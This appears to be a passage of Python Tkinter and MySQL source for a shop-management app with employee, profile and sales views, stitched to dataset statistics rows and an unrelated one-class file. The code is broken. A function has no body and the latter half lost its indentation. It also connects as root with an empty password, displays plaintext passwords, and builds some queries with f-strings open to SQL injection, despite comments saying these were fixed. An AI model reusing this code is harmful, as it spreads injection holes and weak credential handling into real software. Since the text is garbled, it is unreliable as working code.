            dob_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            dob_edit.place(x=625, y=248)
            # The entries were just created, so the original's delete(0,'end')
            # calls were no-ops and have been dropped; pre-fill directly.
            fullname_edit.insert(0, fullname)
            password_edit.insert(0, password)
            designation_edit.insert(0, designation)
            salary_edit.insert(0, salary)
            email_edit.insert(0, email)
            address_edit.insert(0, address)
            phone_edit.insert(0, phone)
            dob_edit.insert(0, dob)
            update_button = Button(self.update_content_frame, cursor='hand2', image=self.update_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=update)
            update_button.place(x=755, y=310)
        except Exception:
            alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)

    self.update_employee_bg_label = Label(self.content_frame, image=self.update_employee_bg_image)
    self.update_employee_bg_label.place(x=-2, y=-2)
    update_employee_label = Label(self.content_frame, text='UPDATE EMPLOYEE', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    update_employee_label.place(x=50, y=40)
    username_search_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    username_search_label.place(x=220, y=90)
    search_edit = Entry(self.content_frame, width=41, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    search_edit.place(x=332, y=90)
    search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
    search_button.place(x=680, y=78)
    self.update_content_frame = Frame(self.content_frame, width=938, height=387, bg='#292B37')
    self.update_content_frame.place(x=22, y=186)
    # Alert label starts invisible (fg == bg) and is recolored on demand.
    alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=90, y=560)
def delete_employees_button_clicked():
    """Render the 'Delete Employee' view.

    Lets the user look up an employee by username, shows the record
    read-only, and deletes it after an explicit confirmation dialog.
    """
    # Reset every sidebar button, then highlight the active one.
    for button in (self.dashboard_button, self.show_products_button,
                   self.add_products_button, self.update_products_button,
                   self.delete_products_button, self.sales_button,
                   self.selling_history_button, self.show_employees_button,
                   self.add_employees_button, self.update_employees_button):
        button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#3C3F4A')
    # Clear whatever the previous view left in the content area.
    for widget in self.content_frame.winfo_children():
        widget.destroy()

    def search():
        """Look up the typed username and show the record with a delete button."""
        def disappear_alert_label():
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass  # the label may already have been destroyed

        def delete():
            """Delete the displayed employee after user confirmation."""
            if not messagebox.askokcancel('Confirm Deletion', 'Do you want to delete the Employee ?'):
                return
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized query: the original interpolated the raw
                # username into the SQL string (injection risk).
                my_cursor.execute('DELETE FROM user_table WHERE UserName = %s', (searched_username,))
                db.commit()
                db.close()
                for widget in self.delete_content_frame.winfo_children():
                    widget.destroy()
                search_edit.delete(0, 'end')
                alert_label.config(text='Successfully deleted the employee', bg='#2FA422', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
            except Exception:
                alert_label.config(text='Sorry! Unable to delete', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

        searched_username = search_edit.get()
        if searched_username == '':
            alert_label.config(text='Enter a Username', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
            return
        for widget in self.delete_content_frame.winfo_children():
            widget.destroy()
        try:
            db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
            my_cursor = db.cursor()
            # Parameterized lookup (original used an f-string).
            my_cursor.execute('SELECT * FROM user_table WHERE UserName = %s', (searched_username,))
            employee = my_cursor.fetchall()
            db.close()  # the original leaked this connection
            # NOTE(review): 'karim' looks like a hard-coded protected
            # account; confirm whether this should really be a literal.
            if len(employee) == 0 or searched_username == 'karim':
                alert_label.config(text='Employee doesn\'t exists', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                return
            # Column layout: 0=name, 1=email, 2=phone, 3=address, 4=dob,
            # 5=designation, 7=password, 8=salary. NULLs become ''.
            row = employee[0]
            fullname = row[0]
            email = row[1] if row[1] is not None else ''
            phone = row[2]
            address = row[3] if row[3] is not None else ''
            dob = row[4] if row[4] is not None else ''
            designation = row[5]
            password = row[7]
            salary = row[8]
            # Caption column at x=202, value column at x=350; rows are
            # spaced 44 px apart starting at y=22 (matches the original
            # hand-written coordinates).
            field_rows = (('Name', fullname), ('Password', password),
                          ('Designation', designation), ('Salary', salary),
                          ('E-mail', email), ('Address', address),
                          ('Phone Number', phone), ('Date of birth', dob))
            for row_index, (caption, value) in enumerate(field_rows):
                y = 22 + 44 * row_index
                caption_label = Label(self.delete_content_frame, text=caption, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                caption_label.place(x=202, y=y)
                value_label = Label(self.delete_content_frame, text=value, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                value_label.place(x=350, y=y)
            delete_button = Button(self.delete_content_frame, cursor='hand2', image=self.delete_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=delete)
            delete_button.place(x=640, y=380)
        except Exception:
            alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)

    self.delete_employee_bg_label = Label(self.content_frame, image=self.update_employee_bg_image)
    self.delete_employee_bg_label.place(x=-2, y=-2)
    delete_employee_label = Label(self.content_frame, text='DELETE EMPLOYEE', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    delete_employee_label.place(x=50, y=40)
    username_search_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    username_search_label.place(x=220, y=90)
    search_edit = Entry(self.content_frame, width=41, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    search_edit.place(x=332, y=90)
    search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
    search_button.place(x=680, y=78)
    self.delete_content_frame = Frame(self.content_frame, width=938, height=446, bg='#292B37')
    self.delete_content_frame.place(x=22, y=154)
    # Alert label starts invisible (fg == bg) and is recolored on demand.
    alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=90, y=560)
def logout():
    """Ask for confirmation, then close this window and reopen the login page."""
    confirmed = messagebox.askyesno('Confirm Logout', 'Do you really want to logout ?')
    if not confirmed:
        return
    try:
        # Build the Qt login window, tear down this Tk window, then show it.
        self.Login_Page = QtWidgets.QMainWindow()
        self.ui = Login_Page.Ui_Login_Window()
        self.ui.setupUi(self.Login_Page)
        self.root.destroy()
        self.Login_Page.show()
    except Exception as e:
        print(e)
def profile():
def edit():
    """Swap the profile popup's contents for an editable form.

    Pre-fills the form from the database and wires Save / Cancel buttons;
    Cancel returns to the read-only profile view.
    """
    def disappear_alert_label():
        try:
            alert_label.config(bg='#292B37', fg='#292B37')
        except Exception:
            pass  # the label may already have been destroyed

    def save():
        """Validate the form and persist the edited profile fields."""
        name = fullname_entry.get()
        password = password_entry.get()
        phone = phone_entry.get()
        email = email_entry.get()
        address = address_entry.get()
        dob = dob_entry.get()
        if '' in (name, password, phone, email, address, dob):
            alert_label.config(text='Fill up all the fields..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
            return
        try:
            db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
            my_cursor = db.cursor()
            # Parameterized query: the original interpolated form text
            # straight into the SQL string (injection risk / broken quoting).
            my_cursor.execute(
                'UPDATE user_table SET Full_Name=%s, User_Password=%s, Phone_Number=%s, '
                'Email=%s, Address=%s, DOB=%s WHERE UserName=%s',
                (name, password, phone, email, address, dob, self.username))
            db.commit()
            db.close()  # the original leaked this connection
            # Go back to the read-only profile view.
            for widget in prof.winfo_children():
                widget.destroy()
            profile_content()
        except Exception:
            alert_label.config(text='Sorry! Unable to edit..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)

    for widget in prof.winfo_children():
        widget.destroy()
    edit_profile_bg_label = Label(prof, image=self.edit_profile_bg_image)
    edit_profile_bg_label.place(x=-2, y=-2)
    edit_profile_label = Label(prof, text='EDIT PROFILE', font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='#BBBBBB')
    edit_profile_label.place(x=40, y=40)
    fullname_label = Label(prof, text='Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    fullname_label.place(x=72, y=110)
    password_label = Label(prof, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    password_label.place(x=72, y=159)
    phone_label = Label(prof, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    phone_label.place(x=72, y=207)
    email_label = Label(prof, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    email_label.place(x=72, y=255)
    address_label = Label(prof, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    address_label.place(x=72, y=303)
    dob_label = Label(prof, text='Date of birth', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    dob_label.place(x=72, y=352)
    fullname_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=40)
    fullname_entry.place(x=198, y=110)
    password_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0)
    password_entry.place(x=198, y=159)
    phone_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0)
    phone_entry.place(x=198, y=207)
    email_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0)
    email_entry.place(x=198, y=255)
    address_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0)
    address_entry.place(x=198, y=303)
    dob_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0)
    dob_entry.place(x=198, y=352)
    try:
        db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
        my_cursor = db.cursor()
        # Parameterized lookup (original used an f-string).
        my_cursor.execute('SELECT * FROM user_table WHERE UserName = %s', (self.username,))
        user_details = my_cursor.fetchall()
        db.close()  # the original leaked this connection
        # Column layout: 0=name, 1=email, 2=phone, 3=address, 4=dob, 7=password.
        record = user_details[0]
        fullname_entry.insert(0, record[0])
        password_entry.insert(0, record[7])
        phone_entry.insert(0, record[2])
        email_entry.insert(0, record[1])
        address_entry.insert(0, record[3])
        dob_entry.insert(0, record[4])
    except Exception as e:
        print(e)
    save_button = Button(prof, cursor='hand2', image=self.save_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=save)
    save_button.place(x=482, y=441)
    cancel_button = Button(prof, cursor='hand2', image=self.cancel_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=profile_content)
    cancel_button.place(x=387, y=441)
    # Alert label starts invisible (fg == bg) and is recolored on demand.
    alert_label = Label(prof, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=40, y=435)
def profile_content():
    """Render the read-only profile view for the logged-in user inside `prof`.

    Clears every widget currently in the Toplevel window, fetches the
    user's row from `user_table`, lays out a label per field, and adds an
    Edit button that switches to the editable view.
    """
    # Wipe whatever view (edit form or a stale profile) is currently shown.
    for widget in prof.winfo_children():
        widget.destroy()
    db = None
    try:
        db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
        my_cursor = db.cursor()
        # Parameterized query: the previous f-string version interpolated
        # self.username directly into the SQL and was injectable.
        query = 'SELECT * FROM user_table WHERE UserName = %s'
        my_cursor.execute(query, (self.username,))
        user_details = my_cursor.fetchall()
        # Column layout assumed from usage here and in the edit form:
        # 0=full name, 1=email, 2=phone, 3=address, 4=DOB, 5=designation,
        # 6=username -- TODO confirm against the user_table schema.
        profile_label = Label(prof, text='PROFILE', font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='#BBBBBB')
        profile_label.place(x=50, y=48)
        name_label = Label(prof, text=user_details[0][0], font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='white')
        name_label.place(x=76, y=109)
        designation_label = Label(prof, text=user_details[0][5], font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='white')
        designation_label.place(x=76, y=150)
        username_label = Label(prof, text=f'Username {user_details[0][6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
        username_label.place(x=76, y=231)
        phone_label = Label(prof, text=f'Phone Number {user_details[0][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
        phone_label.place(x=76, y=269)
        email_label = Label(prof, text=f'E-mail {user_details[0][1]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
        email_label.place(x=76, y=307)
        address_label = Label(prof, text=f'Address {user_details[0][3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
        address_label.place(x=76, y=345)
        dob_label = Label(prof, text=f'Date of birth {user_details[0][4]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
        dob_label.place(x=76, y=384)
        edit_button = Button(prof, cursor='hand2', image=self.edit_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=edit)
        edit_button.place(x=450, y=45)
    except Exception as e:
        # Best-effort UI: on any DB/display failure, log and leave the
        # window empty rather than crashing the whole app (matches the
        # error-handling style used throughout this file).
        print(e)
    finally:
        # The original leaked one connection per refresh; always close it.
        if db is not None:
            db.close()
prof = Toplevel()
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
start_width = int((screen_width - 600) / 2)
start_height = int((screen_height - 500) / 2)
prof.title('User Profile')
prof.iconbitmap(directory_path + '/images/logo.ico')
prof.geometry(f'600x500+{start_width}+{start_height - 30}')
prof.resizable(False, False)
prof.config(bg='#292B37')
profile_content()
self.main_background_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/main_bg.png'))
self.dashboard_logo_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/dashboard_logo.png'))
self.dashboard_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/dashboard_bg.png'))
self.notification_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/notification_img.png'))
self.user_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/user_icon.png'))
self.logout_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/logout_img.png'))
self.add_products_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_product_bg.png'))
self.add_products_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_product_button.png'))
self.update_product_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_product_bg.png'))
self.search_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/search_button_img.png'))
self.update_content_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_content.png'))
self.update_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_button_img.png'))
self.delete_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/delete_button_img.png'))
self.add_employees_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_employee_bg.png'))
self.add_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_employee_button_img.png'))
self.update_employee_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_bg.png'))
self.update_employee_content_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_content.png'))
self.update_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_button_img.png'))
self.delete_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/delete_employee_button.png'))
self.show_employees_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/show_employees_title_bg.png'))
self.show_employee_bg_image = ImageTk.PhotoImage( Image.open(directory_path + '/images/show_employee_bg.png'))
self.sales_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/sales_bg.png'))
self.ok_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/ok_button.png'))
self.search_button_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/search_icon.png'))
self.selling_history_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/selling_history_bg.png'))
self.edit_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/edit_button_img.png'))
self.edit_profile_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/owner_edit_profile_bg.png'))
self.save_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/save_button.png'))
self.cancel_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/cancel_button.png'))
self.main_background_label = Label(self.root, image=self.main_background_image)
self.main_background_label.place(x=-2, y=-2)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT Full_Name FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
fullname = my_cursor.fetchone()[0]
except Exception as e:
print(e)
self.profile_button = Button(self.root, cursor='hand2', image=self.user_icon_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=profile)
self.profile_button.place(x=930, y=25)
self.profile_name_label = Label(self.root, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#BBBBBB')
self.profile_name_label.place(x=962, y=28)
self.logout_button = Button(self.root, cursor='hand2', image=self.logout_icon_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=logout)
self.logout_button.place(x=1200, y=22)
self.content_frame = Frame(self.root, width=980, height=630, bg='#292B37') #bg='#292B37'
self.content_frame.place(x=278, y=64)
self.dashboard_bg_label = Label(self.content_frame, image=self.dashboard_bg_image)
self.dashboard_bg_label.place(x=-2, y=-2)
self.side_frame = Frame(self.root, width=255, height=425, bg='#292B37') # bg='#292B37'
self.side_frame.place(x=18, y=255)
temp_frame = Frame(self.side_frame, width=230, height=421, bg='#292B37', border=None)
temp_frame.place(x=2, y=2)
showall_canvas = Canvas(temp_frame, width=230, height=421, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=230, height=421, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_label1 = Label(self.root, bg='#292B37', height=28, width=-1)
border_hide_label1.place(x=17, y=255)
border_hide_label2 = Label(self.root, bg='#292B37', height=0, width=36)
border_hide_label2.place(x=16, y=238)
border_hide_label3 = Label(self.root, bg='#292B37', height=28, width=-1)
border_hide_label3.place(x=248, y=255)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
self.dashboard_button = Button(final_frame, text='DASHBOARD ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#3C3F4A', borderwidth=0, activebackground='#333640', activeforeground='white', command=dashboard_button_clicked)
self.dashboard_button.pack()
self.show_products_button = Button(final_frame, text='SHOW PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=show_products_button_clicked)
self.show_products_button.pack()
self.add_products_button = Button(final_frame, text='ADD PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=add_products_button_clicked)
self.add_products_button.pack()
self.update_products_button = Button(final_frame, text='UPDATE PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=update_products_button_clicked)
self.update_products_button.pack()
self.delete_products_button = Button(final_frame, text='DELETE PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=delete_products_button_clicked)
self.delete_products_button.pack()
self.sales_button = Button(final_frame, text='SALES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=sales_button_clicked)
self.sales_button.pack()
self.selling_history_button = Button(final_frame, text='SELLING HISTORY ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=selling_history_button_clicked)
self.selling_history_button.pack()
self.show_employees_button = Button(final_frame, text='SHOW EMPLOYEES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=show_employees_button_clicked)
self.show_employees_button.pack()
self.add_employees_button = Button(final_frame, text='ADD EMPLOYEES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=add_employees_button_clicked)
self.add_employees_button.pack()
self.update_employees_button = Button(final_frame, text='UPDATE EMPLOYEES', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=update_employees_button_clicked)
self.update_employees_button.pack()
self.delete_employees_button = Button(final_frame, text='DELETE EMPLOYEES', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=delete_employees_button_clicked)
self.delete_employees_button.pack()
self.welcome_label = Label(self.content_frame, text='WELCOME,', font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='white')
self.welcome_label.place(x=21, y=14)
self.name_label = Label(self.content_frame, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='#BBBBBB')
self.name_label.place(x=118, y=14)
self.recent_sells_label = Label(self.content_frame, text='Recent sells,', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
self.recent_sells_label.place(x=21, y=65)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM sell ORDER BY Sell_ID DESC LIMIT 3'
my_cursor.execute(query)
sell_details = my_cursor.fetchall()
# sell_details = []
if len(sell_details) >= 1:
customer_id = sell_details[0][1]
product_name = sell_details[0][5]
selling_price = sell_details[0][3]
date_of_sell = sell_details[0][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=45, y=309)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=45, y=334)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=45, y=359)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=45, y=384)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=90, y=340)
if len(sell_details) >= 2:
customer_id = sell_details[1][1]
product_name = sell_details[1][5]
selling_price = sell_details[1][3]
date_of_sell = sell_details[1][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=179)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=204)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=229)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=254)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=210)
if len(sell_details) >= 3:
customer_id = sell_details[2][1]
product_name = sell_details[2][5]
selling_price = sell_details[2][3]
date_of_sell = sell_details[2][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=440)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=465)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=490)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=515)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=470)
except Exception as e:
print(e)
self.root.mainloop()
# owner = tk.ThemedTk()
# owner.get_themes()
# owner.set_theme('black')
# EDO = Owner(owner, 'karim')
| 60.986203
| 298
| 0.561986
| 13,903
| 119,350
| 4.626412
| 0.035388
| 0.037313
| 0.056467
| 0.063525
| 0.904821
| 0.868192
| 0.837705
| 0.80504
| 0.781533
| 0.752274
| 0
| 0.063513
| 0.307415
| 119,350
| 1,957
| 299
| 60.986203
| 0.714626
| 0.005756
| 0
| 0.586883
| 0
| 0.006085
| 0.165755
| 0.011854
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033807
| false
| 0.043949
| 0.006085
| 0
| 0.040568
| 0.006761
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02cdaf73c401e6dc1e6281dcb00722bef22d7c78
| 93
|
py
|
Python
|
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
from SLURM import SLURMJob
class StampedeJob(SLURMJob):
    """SLURM job targeting the Stampede cluster.

    The generic SLURMJob behavior is sufficient; no overrides are needed.
    """
| 15.5
| 28
| 0.784946
| 11
| 93
| 6.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 93
| 5
| 29
| 18.6
| 0.935897
| 0.268817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
